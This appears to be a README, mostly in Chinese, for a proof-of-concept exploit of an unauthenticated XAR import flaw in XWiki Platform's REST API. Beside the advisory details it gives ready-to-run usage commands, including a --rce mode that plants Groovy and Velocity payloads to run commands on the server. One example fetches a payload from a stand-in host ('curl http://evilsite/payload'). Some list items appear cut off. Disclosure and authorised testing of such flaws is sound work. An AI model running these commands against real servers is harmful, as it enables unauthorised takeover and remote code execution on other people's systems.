XWiki Platform - 通过 REST /wikis/{wikiName} 实现未认证的 XAR 导入
XWiki Platform 中的 POST /wikis/{wikiName} REST API 端点会执行 XAR(XWiki Archive)导入,且不进行任何身份验证或授权检查。未认证的攻击者可以通过发送精心构造的 XAR 文件,在目标 wiki 中创建或更新任意文档。
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| 状态 | 版本 |
|---|---|
| 受影响 | > 15.10.16, > 16.4.6, > 16.10.2 |
| 已修复 | 16.10.17, 17.4.9, 17.10.3, 18.1.0-rc-1 |
未认证的攻击者可以:
REST 端点 POST /xwiki/rest/wikis/{wikiName} 接受请求体中的 XAR 文件,并将其直接导入 wiki,而不会检查请求者是否具有 ADMIN 权限。修复(提交 4b7b95b)通过使用 ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...) 增加了授权检查。
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)--rce 标志会导入包含 Groovy 和 Velocity 有效负载的页面,这些负载会执行指定的命令字符串。它会自动:
{{groovy}} 和 {{velocity}} 宏中的页面成功实现 RCE 的条件:
-u / --password 提供凭据)package.xml - 包描述符{Space}/{Page}.xml - 包含内容的文档 XML此 PoC 仅用于教育和授权的安全测试目的。对您不拥有或未经明确许可测试的系统使用此漏洞利用程序是非法的。作者不对因使用本软件而造成的任何误用或损害负责。